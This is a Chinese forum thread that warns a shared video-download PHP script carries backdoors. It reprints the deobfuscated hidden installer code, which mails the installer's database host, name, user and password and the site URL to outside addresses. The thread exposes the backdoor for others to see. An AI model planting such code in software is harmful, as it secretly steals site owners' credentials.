关于某大佬发的[视频下载解析源码]可能含有后门的警告

flyqie · 发表于 2019-12-7 20:26:42

本帖最后由 flyqie 于 2019-12-7 20:46 编辑

大佬帖子:
https://www.52.ht/thread-620400-1-1.html
分析:
install/database_details.php :

install/includes/encrypt.php:

加密？混淆？没关系，写个php破解下(字数超限):
https://pastebin.com/7x1PkQrb
好的，跑出来了:
[ol]

正在进行第1次操作

第1次操作完毕

正在进行第2次操作

第2次操作完毕

正在进行第3次操作

第3次操作完毕

正在进行第4次操作

第4次操作完毕

正在进行第5次操作

第5次操作完毕

正在进行第6次操作

第6次操作完毕

正在进行第7次操作

第7次操作完毕

正在进行第8次操作

第8次操作完毕

正在进行第9次操作

第9次操作完毕

正在进行第10次操作

第10次操作完毕

正在进行第11次操作

第11次操作完毕

正在进行第12次操作

第12次操作完毕

正在进行第13次操作

第13次操作完毕

正在进行第14次操作

第14次操作完毕

正在进行第15次操作

第15次操作完毕

正在进行第16次操作

第16次操作完毕

正在进行第17次操作

已解密疑似内容,内容为[

$timezone_name = date_default_timezone_set('Asia/Kolkata');

$ip_mail = getenv('HTTP_CLIENT_IP')?:

getenv('HTTP_X_FORWARDED_FOR')?:

getenv('HTTP_X_FORWARDED')?:

getenv('HTTP_FORWARDED_FOR')?:

getenv('HTTP_FORWARDED')?:

getenv('REMOTE_ADDR');

$validation_ip = $ip_mail;

date_default_timezone_set('Asia/Kolkata');

$date_1 = date("d-m-Y");

$date_2 = " ";

$date_3 = date("h:i:sa");

$date = $date_1 . $date_2 . $date_3;

$validation_date = $date;

$validation_url = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";

$to = "[email protected], [email protected]";

$subject = "HTML email";

$rand_num_1 = rand(254651,35153514);

$rand_num_2 = rand(682734,85214651);

$rand_num_3 = rand(663221,63147895);

$install_code = $rand_num_1 . $rand_num_2 . $rand_num_3;

$host_name = $_SESSION["server"]; //1

$host_db_name = $_SESSION["database"]; //2

$host_db_user = $_SESSION["username"]; //3

$host_db_pass = $_SESSION["password"]; //4

$url = $validation_url; //5

$date_1 = date("d-m-Y");

$date_2 = " ";

$date_3 = date("h:i:sa");

$date_created = $date_1 . $date_2 . $date_3; //6

$html_2 = '

iframe.hidden

{

display:none

}

';

echo $html_2;

$message_mail = "

HTML email

Hosting Install Info

[color=]Hosting Details :

Host : ".$_SESSION["server"]."
Database : ".$_SESSION["database"]."
Username : ".$_SESSION["username"]."
Password : ".$_SESSION["password"]."
Url : ".$validation_url."
Date : ".$validation_date."
TimeZone : ".$timezone_name."
Location IP : ".$validation_ip."
Install Code : ".$install_code."

Poison Successfully Injected

";

// Always set content-type when sending HTML email

$headers = "MIME-Version: 1.0" . "\r\n";

$headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";

// More headers

$headers .= 'From: ' . "\r\n";

$headers .= 'Cc: [email protected]' . "\r\n";

mail($to,$subject,$message_mail,$headers);

][/ol]复制代码
代码还原出来了，整理一下(字数超限):
https://pastebin.com/gmGVEfHA
到此，分析完毕，该源码可能会导致安装者站点关键信息泄露.
但我相信，loc大佬是清白的，初衷是为了分享，也没有想到可能会有后门.
本人技术有限，如有错误，恳请指出，谢谢!
-------------------------------------------------------------------
更新:
又发现后门(注释上写的后门文件是在后续解密已加密文件后得出结论的,注释写于解密分析已加密文件完毕后):
install/website_details_settings.php :

install/includes/fncrypt.php :
emmmm混淆了

加密方式如出一辙，继续用之前的php解密跑一遍(字数超限):
https://pastebin.com/94Be5DTv
格式化分析一下(字数超限):
https://pastebin.com/sFn0cR0E
到此，第二轮分析完毕，该源码可能会导致站点管理员信息泄露.
还是那句话:
我相信，loc大佬是清白的，初衷是为了分享，也没有想到可能会有后门.
本人技术有限，如有错误，恳请指出，谢谢!

wolfewong · 发表于 2019-12-7 20:42:41

后门好像挺多的

seeseexiyou · 发表于 2019-12-8 10:47:00

前排围观大佬在线解密啊

okvps · 发表于 2019-12-7 20:29:46

不懂，顶上去让更多大佬看到

kzus · 发表于 2019-12-7 20:32:40

[email protected]
[email protected]

TianTangJun · 发表于 2019-12-7 20:35:04

前排围观下

梦里寻她她他它 · 发表于 2019-12-7 20:36:37

支持解密

判官 · 发表于 2019-12-7 20:37:49

有点复杂。

SВ · 发表于 2019-12-7 20:43:25

揭秘贴要支持阿哈哈技术贴

，不知道大佬哪里找的，不过除了Hotmail，里面的关键邮箱域名都是未解析待注册的？

leasr四面楚歌 · 发表于 2019-12-7 20:43:30

前排吃瓜 zsbd

		自动登录	找回密码
密码			立即注册

关于某大佬发的[视频下载解析源码]可能含有后门的警告

本帖子中包含更多资源